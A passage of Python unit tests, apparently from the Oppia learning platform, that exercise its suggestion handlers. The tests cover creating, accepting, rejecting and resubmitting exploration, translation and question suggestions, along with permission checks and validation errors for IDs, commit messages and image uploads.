'target_type': (
feconf.ENTITY_TYPE_EXPLORATION),
'target_id': 'exp1',
'target_version_at_submission': exploration.version,
'change': {
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'state_name': 'State 2',
'old_value': self.old_content,
'new_value': self.new_content
},
'description': 'change to state 2',
}, csrf_token=csrf_token)
self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_EDIT_STATE_CONTENT),
'target_type': (
feconf.ENTITY_TYPE_EXPLORATION),
'target_id': 'exp1',
'target_version_at_submission': exploration.version,
'change': {
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'state_name': 'State 3',
'old_value': self.old_content,
'new_value': self.new_content
},
'description': 'change to state 3',
}, csrf_token=csrf_token)
self.logout()
self.login(self.TRANSLATOR_EMAIL)
csrf_token = self.get_new_csrf_token()
self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_TRANSLATE_CONTENT),
'target_type': feconf.ENTITY_TYPE_EXPLORATION,
'target_id': 'exp1',
'target_version_at_submission': exploration.version,
'change': {
'cmd': exp_domain.CMD_ADD_TRANSLATION,
'state_name': 'State 3',
'content_id': 'content',
'language_code': 'hi',
'content_html': '<p>old content html</p>',
'translation_html': '<p>In Hindi</p>'
},
'description': 'change to state 3',
}, csrf_token=csrf_token)
self.logout()
def test_create_suggestion(self):
self.login(self.AUTHOR_EMAIL_2)
csrf_token = self.get_new_csrf_token()
exploration = exp_fetchers.get_exploration_by_id(self.EXP_ID)
self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_EDIT_STATE_CONTENT),
'target_type': (
feconf.ENTITY_TYPE_EXPLORATION),
'target_id': 'exp1',
'target_version_at_submission': exploration.version,
'change': {
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'state_name': 'State 3',
'new_value': self.new_content
},
'description': 'change again to state 3',
}, csrf_token=csrf_token)
suggestions = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id_2))['suggestions']
self.assertEqual(len(suggestions), 3)
self.logout()
def test_create_suggestion_invalid_target_version_input(self):
self.login(self.AUTHOR_EMAIL_2)
csrf_token = self.get_new_csrf_token()
response = self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_EDIT_STATE_CONTENT),
'target_type': (
feconf.ENTITY_TYPE_EXPLORATION),
'target_id': 'exp1',
'target_version_at_submission': 'invalid target version',
'change': {
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'state_name': 'State 3',
'new_value': self.new_content
},
'description': 'change again to state 3',
}, csrf_token=csrf_token, expected_status_int=400)
suggestions = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id_2))['suggestions']
self.assertEqual(
response['error'],
'Expected target_version_at_submission to be an int, received <type'
' \'unicode\'>')
self.assertEqual(len(suggestions), 2)
self.logout()
def test_suggestion_to_exploration_handler_with_invalid_suggestion_id(self):
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
suggestion_to_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id))['suggestions'][0]
csrf_token = self.get_new_csrf_token()
# Invalid format of suggestion id.
response = self.put_json(
'%s/exploration/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_accept['target_id'], 'invalid_suggestion_id'), {
'action': u'reject',
'review_message': u'Rejected!'
}, csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(
response['error'],
'Invalid format for suggestion_id. It must contain 3 parts '
'separated by \'.\'')
csrf_token = self.get_new_csrf_token()
# Suggestion does not exist.
self.put_json(
'%s/exploration/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_accept['target_id'],
'exploration.target_id.id'), {
'action': u'reject',
'review_message': u'Rejected!'
}, csrf_token=csrf_token,
expected_status_int=404)
self.logout()
def test_suggestion_to_exploration_handler_with_invalid_target_type(self):
self.login(self.EDITOR_EMAIL)
question_dict = {
'question_state_data': self._create_valid_question_data(
'default_state').to_dict(),
'language_code': 'en',
'question_state_data_schema_version': (
feconf.CURRENT_STATE_SCHEMA_VERSION),
'linked_skill_ids': ['skill_id'],
'inapplicable_skill_misconception_ids': ['skillid12345-1']
}
exp_id = 'new_exp_id'
self.save_new_default_exploration(exp_id, self.editor_id)
suggestion_services.create_suggestion(
feconf.SUGGESTION_TYPE_ADD_QUESTION,
feconf.ENTITY_TYPE_TOPIC, exp_id, 1,
self.author_id, {
'cmd': (
question_domain
.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION),
'question_dict': question_dict,
'skill_id': None,
'skill_difficulty': 0.3
}, None)
suggestion_id = suggestion_services.query_suggestions(
[('author_id', self.author_id), (
'target_id', exp_id)])[0].suggestion_id
csrf_token = self.get_new_csrf_token()
response = self.put_json(
'%s/exploration/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX, exp_id,
suggestion_id), {
'action': u'reject',
'review_message': u'Rejected!'
}, csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(
response['error'],
'This handler allows actions only on suggestions to explorations.')
self.logout()
def test_suggestion_to_exploration_handler_with_invalid_target_id(self):
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
suggestion_to_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id))['suggestions'][0]
self.save_new_default_exploration('exp_id', self.editor_id)
csrf_token = self.get_new_csrf_token()
response = self.put_json(
'%s/exploration/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX, 'exp_id',
suggestion_to_accept['suggestion_id']), {
'action': u'reject',
'review_message': u'Rejected!'
}, csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(
response['error'],
'The exploration id provided does not match the exploration id '
'present as part of the suggestion_id')
self.logout()
    def test_owner_of_exploration_cannot_respond_to_own_suggestion(self):
self.login(self.EDITOR_EMAIL)
exp_id = 'new_exp_id'
self.save_new_default_exploration(exp_id, self.editor_id)
new_content = state_domain.SubtitledHtml(
'content', '<p>new content html</p>').to_dict()
change_cmd = {
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'state_name': 'State 1',
'new_value': new_content
}
suggestion_services.create_suggestion(
feconf.SUGGESTION_TYPE_EDIT_STATE_CONTENT,
feconf.ENTITY_TYPE_EXPLORATION, exp_id, 1,
self.editor_id, change_cmd, 'sample description')
suggestion_id = suggestion_services.query_suggestions(
[('author_id', self.editor_id), (
'target_id', exp_id)])[0].suggestion_id
csrf_token = self.get_new_csrf_token()
response = self.put_json(
'%s/exploration/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
exp_id, suggestion_id), {
'action': u'reject',
'review_message': u'Rejected!'
}, csrf_token=csrf_token, expected_status_int=401)
self.assertEqual(
response['error'], 'You cannot accept/reject your own suggestion.')
self.logout()
def test_suggestion_to_exploration_handler_with_invalid_action(self):
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
suggestion_to_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id))['suggestions'][0]
csrf_token = self.get_new_csrf_token()
response = self.put_json(
'%s/exploration/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_accept['target_id'],
suggestion_to_accept['suggestion_id']),
{'action': 'invalid_action'}, csrf_token=csrf_token,
expected_status_int=400)
self.assertEqual(
response['error'], 'Invalid action.')
self.logout()
def test_reject_suggestion_to_exploration(self):
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
suggestion_to_reject = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id))['suggestions'][0]
suggestion = suggestion_services.get_suggestion_by_id(
suggestion_to_reject['suggestion_id'])
self.assertEqual(
suggestion.status, suggestion_models.STATUS_IN_REVIEW)
csrf_token = self.get_new_csrf_token()
self.put_json('%s/exploration/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_reject['target_id'],
suggestion_to_reject['suggestion_id']), {
'action': u'reject',
'review_message': u'Rejected!'
}, csrf_token=csrf_token)
suggestion = suggestion_services.get_suggestion_by_id(
suggestion_to_reject['suggestion_id'])
self.assertEqual(
suggestion.status, suggestion_models.STATUS_REJECTED)
self.logout()
    def test_suggestion_to_exploration_handler_with_long_commit_message(self):
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
suggestion_to_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id))['suggestions'][0]
csrf_token = self.get_new_csrf_token()
response = self.put_json('%s/exploration/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_accept['target_id'],
suggestion_to_accept['suggestion_id']), {
'action': u'accept',
'commit_message':
u'a' * (feconf.MAX_COMMIT_MESSAGE_LENGTH + 1),
'review_message': u'Accepted'
}, csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(
response['error'],
'Commit messages must be at most 1000 characters long.'
)
def test_accept_suggestion(self):
exploration = exp_fetchers.get_exploration_by_id(self.EXP_ID)
# Test editor can accept successfully.
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
suggestion_to_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id))['suggestions'][0]
# By default, when a suggestion is accepted and the recording of scores
# is enabled, the score of the author of that suggestion is increased
# by 1. Therefore, by setting that increment to the minimum score
# required to review, we can ensure that the author of this suggestion
# has a high enough score to review suggestions in this category. This
# will be used to test whether the author can review a suggestion in
# the same category because of the author's high score in a later test.
enable_recording_of_scores_swap = self.swap(
feconf, 'ENABLE_RECORDING_OF_SCORES', True)
increment_score_of_author_swap = self.swap(
suggestion_models, 'INCREMENT_SCORE_OF_AUTHOR_BY',
feconf.MINIMUM_SCORE_REQUIRED_TO_REVIEW)
with enable_recording_of_scores_swap, increment_score_of_author_swap:
csrf_token = self.get_new_csrf_token()
self.put_json('%s/exploration/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_accept['target_id'],
suggestion_to_accept['suggestion_id']), {
'action': u'accept',
'commit_message': u'commit message',
'review_message': u'Accepted'
}, csrf_token=csrf_token)
suggestion_post_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id))['suggestions'][0]
self.assertEqual(
suggestion_post_accept['status'],
suggestion_models.STATUS_ACCEPTED)
exploration = exp_fetchers.get_exploration_by_id(self.EXP_ID)
self.assertEqual(
exploration.states[suggestion_to_accept[
'change']['state_name']].content.html,
suggestion_to_accept['change']['new_value']['html'])
self.logout()
# Testing user without permissions cannot accept.
self.login(self.NORMAL_USER_EMAIL)
suggestion_to_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id_2))['suggestions'][0]
csrf_token = self.get_new_csrf_token()
self.put_json('%s/exploration/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_accept['target_id'],
suggestion_to_accept['suggestion_id']), {
'action': u'accept',
'commit_message': u'commit message',
'review_message': u'Accepted'
}, csrf_token=csrf_token, expected_status_int=401)
self.logout()
# Testing that author cannot accept own suggestion.
self.login(self.AUTHOR_EMAIL_2)
suggestion_to_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id_2))['suggestions'][0]
csrf_token = self.get_new_csrf_token()
self.put_json('%s/exploration/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_accept['target_id'],
suggestion_to_accept['suggestion_id']), {
'action': u'accept',
'commit_message': u'commit message',
'review_message': u'Accepted'
}, csrf_token=csrf_token, expected_status_int=401)
# Testing users with scores above threshold can accept.
# The score of this author was increased to the review threshold amount
# when the editor accepted a suggestion that was authored by this user.
self.login(self.AUTHOR_EMAIL)
csrf_token = self.get_new_csrf_token()
self.put_json('%s/exploration/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_accept['target_id'],
suggestion_to_accept['suggestion_id']), {
'action': u'accept',
'commit_message': u'commit message',
'review_message': u'Accepted'
}, csrf_token=csrf_token)
suggestion_post_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id_2))['suggestions'][0]
self.assertEqual(
suggestion_post_accept['status'],
suggestion_models.STATUS_ACCEPTED)
self.logout()
# Testing admins can accept suggestions.
self.login(self.ADMIN_EMAIL)
csrf_token = self.get_new_csrf_token()
suggestion_to_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id_2))['suggestions'][1]
self.put_json('%s/exploration/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_accept['target_id'],
suggestion_to_accept['suggestion_id']), {
'action': u'accept',
'commit_message': u'commit message',
'review_message': u'Accepted'
}, csrf_token=csrf_token)
suggestion_post_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id_2))['suggestions'][1]
self.assertEqual(
suggestion_post_accept['status'],
suggestion_models.STATUS_ACCEPTED)
self.logout()
def test_suggestion_list_handler_with_invalid_query_field(self):
response = self.get_json(
'%s?invalid_query_field=value' % (
feconf.SUGGESTION_LIST_URL_PREFIX), expected_status_int=400)
self.assertEqual(
response['error'],
'Not allowed to query on field invalid_query_field')
def test_suggestion_list_handler(self):
suggestions = self.get_json(
'%s?author_id=%s&target_type=%s&target_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX, self.author_id_2,
feconf.ENTITY_TYPE_EXPLORATION, self.EXP_ID)
)['suggestions']
self.assertEqual(len(suggestions), 2)
def test_cannot_resubmit_suggestion_with_invalid_suggestion_id(self):
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
response = self.put_json(
'%s/resubmit/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX, 'invalid_suggestion_id'), {
'action': u'reject',
'review_message': u'Rejected!'
}, csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(
response['error'], 'No suggestion found with given suggestion id')
def test_resubmit_rejected_suggestion(self):
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
suggestion = suggestion_services.query_suggestions(
[('author_id', self.author_id), ('target_id', self.EXP_ID)])[0]
suggestion_services.reject_suggestion(
suggestion.suggestion_id, self.reviewer_id, 'reject message')
self.logout()
self.login(self.AUTHOR_EMAIL)
csrf_token = self.get_new_csrf_token()
self.put_json('%s/resubmit/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX, suggestion.suggestion_id), {
'summary_message': 'summary message',
'action': u'resubmit',
'change': {
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'state_name': 'State 1',
'new_value': self.resubmit_change_content,
'old_value': self.old_content
}
}, csrf_token=csrf_token)
suggestion = suggestion_services.query_suggestions(
[('author_id', self.author_id), ('target_id', self.EXP_ID)])[0]
self.assertEqual(
suggestion.status, suggestion_models.STATUS_IN_REVIEW)
self.assertEqual(
suggestion.change.new_value['html'],
self.resubmit_change_content['html'])
self.assertEqual(
suggestion.change.cmd, exp_domain.CMD_EDIT_STATE_PROPERTY)
self.assertEqual(
suggestion.change.property_name, exp_domain.STATE_PROPERTY_CONTENT)
self.assertEqual(
suggestion.change.state_name, 'State 1')
self.logout()
def test_translation_accept_suggestion_by_reviewer(self):
# Test reviewer can accept successfully.
self.login(self.REVIEWER_EMAIL)
csrf_token = self.get_new_csrf_token()
suggestion_to_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.translator_id))['suggestions'][0]
csrf_token = self.get_new_csrf_token()
self.put_json('%s/exploration/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_accept['target_id'],
suggestion_to_accept['suggestion_id']), {
'action': u'accept',
'commit_message': u'commit message',
'review_message': u'Accepted'
}, csrf_token=csrf_token)
suggestion_post_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.translator_id))['suggestions'][0]
self.assertEqual(
suggestion_post_accept['status'],
suggestion_models.STATUS_ACCEPTED)
self.logout()
def test_translation_suggestion_creation_with_new_images(self):
exp_id = '12345678exp1'
exploration = (
self.save_new_linear_exp_with_state_names_and_interactions(
exp_id, self.editor_id, ['State 1'],
['EndExploration'], category='Algebra'))
state_content_dict = {
'content_id': 'content',
'html': (
'<oppia-noninteractive-image filepath-with-value='
'""img.png"" caption-with-value="""" '
'alt-with-value=""Image"">'
'</oppia-noninteractive-image>')
}
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
with python_utils.open_file(
os.path.join(feconf.TESTS_DATA_DIR, 'img.png'),
'rb', encoding=None) as f:
raw_image = f.read()
self.post_json(
'%s/exploration/%s' % (self.IMAGE_UPLOAD_URL_PREFIX, exp_id),
{'filename': 'img.png'},
csrf_token=csrf_token,
upload_files=(('image', 'unused_filename', raw_image),))
exp_services.update_exploration(
self.editor_id, exp_id, [exp_domain.ExplorationChange({
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'state_name': 'State 1',
'new_value': state_content_dict
})], 'Changes content.')
rights_manager.publish_exploration(self.editor, exp_id)
exploration = exp_fetchers.get_exploration_by_id(exp_id)
text_to_translate = exploration.states['State 1'].content.html
self.logout()
fs = fs_domain.AbstractFileSystem(
fs_domain.GcsFileSystem(feconf.ENTITY_TYPE_EXPLORATION, exp_id))
self.assertTrue(fs.isfile('image/img.png'))
self.login(self.TRANSLATOR_EMAIL)
csrf_token = self.get_new_csrf_token()
self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_TRANSLATE_CONTENT),
'target_type': feconf.ENTITY_TYPE_EXPLORATION,
'target_id': exp_id,
'target_version_at_submission': exploration.version,
'change': {
'cmd': exp_domain.CMD_ADD_TRANSLATION,
'state_name': 'State 1',
'content_id': 'content',
'language_code': 'hi',
'content_html': text_to_translate,
'translation_html': (
'<oppia-noninteractive-image filepath-with-value='
'""translation_image.png"" '
'caption-with-value="""" '
'alt-with-value=""Image"">'
'</oppia-noninteractive-image>')
},
}, csrf_token=csrf_token,
upload_files=(
('translation_image.png', 'translation_image.png', raw_image), )
)
fs = fs_domain.AbstractFileSystem(
fs_domain.GcsFileSystem(
feconf.IMAGE_CONTEXT_EXPLORATION_SUGGESTIONS, exp_id))
self.assertTrue(fs.isfile('image/img.png'))
self.assertTrue(fs.isfile('image/img_compressed.png'))
self.assertTrue(fs.isfile('image/translation_image.png'))
suggestion_to_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.translator_id))['suggestions'][0]
self.logout()
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
self.put_json('%s/exploration/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_accept['target_id'],
suggestion_to_accept['suggestion_id']), {
'action': u'accept',
'commit_message': u'Translated content of State 1',
'review_message': u'This looks good!',
}, csrf_token=csrf_token)
fs = fs_domain.AbstractFileSystem(
fs_domain.GcsFileSystem(feconf.ENTITY_TYPE_EXPLORATION, exp_id))
self.assertTrue(fs.isfile('image/img.png'))
self.assertTrue(fs.isfile('image/translation_image.png'))
self.assertTrue(fs.isfile('image/img_compressed.png'))
class QuestionSuggestionTests(test_utils.GenericTestBase):
AUTHOR_EMAIL = 'author@example.com'
AUTHOR_EMAIL_2 = 'author2@example.com'
# Needs to be 12 characters long.
SKILL_ID = 'skill1234567'
SKILL_DESCRIPTION = 'skill to link question to'
def setUp(self):
super(QuestionSuggestionTests, self).setUp()
self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
self.signup(self.AUTHOR_EMAIL, 'author')
self.admin_id = self.get_user_id_from_email(self.ADMIN_EMAIL)
self.author_id = self.get_user_id_from_email(self.AUTHOR_EMAIL)
self.set_admins([self.ADMIN_USERNAME])
self.save_new_skill(
self.SKILL_ID, self.admin_id, description=self.SKILL_DESCRIPTION)
self.question_dict = {
'question_state_data': self._create_valid_question_data(
'default_state').to_dict(),
'language_code': 'en',
'question_state_data_schema_version': (
feconf.CURRENT_STATE_SCHEMA_VERSION),
'linked_skill_ids': [self.SKILL_ID],
'inapplicable_skill_misconception_ids': ['skillid12345-1']
}
self.login(self.AUTHOR_EMAIL)
csrf_token = self.get_new_csrf_token()
self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_ADD_QUESTION),
'target_type': feconf.ENTITY_TYPE_SKILL,
'target_id': self.SKILL_ID,
'target_version_at_submission': 1,
'change': {
'cmd': (
question_domain
.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION),
'question_dict': self.question_dict,
'skill_id': self.SKILL_ID,
'skill_difficulty': 0.3
},
'description': 'Add new question to skill'
}, csrf_token=csrf_token)
self.logout()
def test_query_question_suggestions(self):
suggestions = self.get_json(
'%s?suggestion_type=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
feconf.SUGGESTION_TYPE_ADD_QUESTION)
)['suggestions']
self.assertEqual(len(suggestions), 1)
suggestion = suggestions[0]
self.assertEqual(
suggestion['suggestion_type'],
feconf.SUGGESTION_TYPE_ADD_QUESTION)
self.assertEqual(suggestion['target_id'], self.SKILL_ID)
self.assertEqual(
suggestion['target_type'], feconf.ENTITY_TYPE_SKILL)
self.assertEqual(
suggestion['change']['cmd'],
question_domain.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION)
def test_accept_question_suggestion(self):
suggestion_to_accept = self.get_json(
'%s?suggestion_type=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
feconf.SUGGESTION_TYPE_ADD_QUESTION)
)['suggestions'][0]
self.login(self.ADMIN_EMAIL)
csrf_token = self.get_new_csrf_token()
with self.swap(constants, 'ENABLE_NEW_STRUCTURE_VIEWER_UPDATES', True):
self.put_json('%s/skill/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_accept['target_id'],
suggestion_to_accept['suggestion_id']), {
'action': u'accept',
'commit_message': u'commit message',
'review_message': u'This looks good!',
'skill_id': self.SKILL_ID
}, csrf_token=csrf_token)
suggestion_post_accept = self.get_json(
'%s?suggestion_type=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
feconf.SUGGESTION_TYPE_ADD_QUESTION)
)['suggestions'][0]
self.assertEqual(
suggestion_post_accept['status'],
suggestion_models.STATUS_ACCEPTED)
(
questions, merged_question_skill_links, _) = (
question_services.get_displayable_question_skill_link_details(
1, [self.SKILL_ID], ''))
self.assertEqual(len(questions), 1)
self.assertEqual(
merged_question_skill_links[0].skill_descriptions,
[self.SKILL_DESCRIPTION])
self.assertEqual(
merged_question_skill_links[0].skill_difficulties, [0.3])
self.assertEqual(
questions[0].question_content,
self.question_dict['question_state_data']['content']['html']
)
thread_messages = feedback_services.get_messages(
suggestion_to_accept['suggestion_id'])
last_message = thread_messages[len(thread_messages) - 1]
self.assertEqual(last_message.text, 'This looks good!')
def test_suggestion_creation_with_valid_images(self):
self.save_new_skill(
'skill_id2', self.admin_id, description='description')
question_state_data_dict = self._create_valid_question_data(
'default_state').to_dict()
valid_html = (
'<oppia-noninteractive-math math_content-with-value="{&q'
'uot;raw_latex&quot;: &quot;(x - a_1)(x - a_2)(x - a'
'_3)...(x - a_n-1)(x - a_n)&quot;, &quot;svg_filenam'
'e&quot;: &quot;file.svg&quot;}"></oppia-noninte'
'ractive-math>'
)
question_state_data_dict['content']['html'] = valid_html
self.question_dict = {
'question_state_data': question_state_data_dict,
'language_code': 'en',
'question_state_data_schema_version': (
feconf.CURRENT_STATE_SCHEMA_VERSION),
'linked_skill_ids': ['skill_id2'],
'inapplicable_skill_misconception_ids': []
}
self.login(self.AUTHOR_EMAIL)
csrf_token = self.get_new_csrf_token()
with python_utils.open_file(
os.path.join(feconf.TESTS_DATA_DIR, 'test_svg.svg'),
'rb', encoding=None) as f:
raw_image = f.read()
self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_ADD_QUESTION),
'target_type': feconf.ENTITY_TYPE_SKILL,
'target_id': self.SKILL_ID,
'target_version_at_submission': 1,
'change': {
'cmd': (
question_domain
.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION),
'question_dict': self.question_dict,
'skill_id': self.SKILL_ID,
'skill_difficulty': 0.3
},
'description': 'Add new question to skill'
}, csrf_token=csrf_token, upload_files=(
('file.svg', 'file.svg', raw_image), ))
self.logout()
def test_suggestion_creation_when_images_are_not_provided(self):
self.save_new_skill(
'skill_id2', self.admin_id, description='description')
question_state_data_dict = self._create_valid_question_data(
'default_state').to_dict()
valid_html = (
'<oppia-noninteractive-math math_content-with-value="{&q'
'uot;raw_latex&quot;: &quot;(x - a_1)(x - a_2)(x - a'
'_3)...(x - a_n-1)(x - a_n)&quot;, &quot;svg_filenam'
'e&quot;: &quot;file.svg&quot;}"></oppia-noninte'
'ractive-math>'
)
question_state_data_dict['content']['html'] = valid_html
self.question_dict = {
'question_state_data': question_state_data_dict,
'language_code': 'en',
'question_state_data_schema_version': (
feconf.CURRENT_STATE_SCHEMA_VERSION),
'linked_skill_ids': ['skill_id2'],
'inapplicable_skill_misconception_ids': []
}
self.login(self.AUTHOR_EMAIL)
csrf_token = self.get_new_csrf_token()
response_dict = self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_ADD_QUESTION),
'target_type': feconf.ENTITY_TYPE_SKILL,
'target_id': self.SKILL_ID,
'target_version_at_submission': 1,
'change': {
'cmd': (
question_domain
.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION),
'question_dict': self.question_dict,
'skill_id': self.SKILL_ID,
'skill_difficulty': 0.3
},
'description': 'Add new question to skill'
}, csrf_token=csrf_token, expected_status_int=400)
self.assertIn(
'No image data provided for file with name file.svg.',
response_dict['error'])
self.logout()
def test_suggestion_creation_when_images_are_not_valid(self):
self.save_new_skill(
'skill_id2', self.admin_id, description='description')
question_state_data_dict = self._create_valid_question_data(
'default_state').to_dict()
valid_html = (
'<oppia-noninteractive-math math_content-with-value="{&q'
'uot;raw_latex&quot;: &quot;(x - a_1)(x - a_2)(x - a'
'_3)...(x - a_n-1)(x - a_n)&quot;, &quot;svg_filenam'
'e&quot;: &quot;file.svg&quot;}"></oppia-noninte'
'ractive-math>'
)
question_state_data_dict['content']['html'] = valid_html
self.question_dict = {
'question_state_data': question_state_data_dict,
'language_code': 'en',
'question_state_data_schema_version': (
feconf.CURRENT_STATE_SCHEMA_VERSION),
'linked_skill_ids': ['skill_id2'],
'inapplicable_skill_misconception_ids': []
}
self.login(self.AUTHOR_EMAIL)
csrf_token = self.get_new_csrf_token()
large_image = '<svg><path d="%s" /></svg>' % (
'M150 0 L75 200 L225 200 Z ' * 4000)
response_dict = self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_ADD_QUESTION),
'target_type': feconf.ENTITY_TYPE_SKILL,
'target_id': self.SKILL_ID,
'target_version_at_submission': 1,
'change': {
'cmd': (
question_domain
.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION),
'question_dict': self.question_dict,
'skill_id': self.SKILL_ID,
'skill_difficulty': 0.3
},
'description': 'Add new question to skill'
}, csrf_token=csrf_token,
upload_files=(
('file.svg', 'file.svg', large_image),),
expected_status_int=400)
self.assertIn(
'Image exceeds file size limit of 100 KB.',
response_dict['error'])
self.logout()
class SkillSuggestionTests(test_utils.GenericTestBase):
AUTHOR_EMAIL = 'author@example.com'
REVIEWER_EMAIL = 'reviewer@example.com'
def setUp(self):
super(SkillSuggestionTests, self).setUp()
self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
self.signup(self.AUTHOR_EMAIL, 'author')
self.signup(self.REVIEWER_EMAIL, 'reviewer')
self.admin_id = self.get_user_id_from_email(self.ADMIN_EMAIL)
self.author_id = self.get_user_id_from_email(self.AUTHOR_EMAIL)
self.reviewer_id = self.get_user_id_from_email(self.REVIEWER_EMAIL)
self.set_admins([self.ADMIN_USERNAME])
user_services.allow_user_to_review_question(self.reviewer_id)
self.skill_id = skill_services.get_new_skill_id()
self.save_new_skill(
self.skill_id, self.admin_id, description='Description')
self.question_dict = {
'question_state_data': self._create_valid_question_data(
'default_state').to_dict(),
'language_code': 'en',
'question_state_data_schema_version': (
feconf.CURRENT_STATE_SCHEMA_VERSION),
'linked_skill_ids': [self.skill_id],
'inapplicable_skill_misconception_ids': ['skillid12345-1']
}
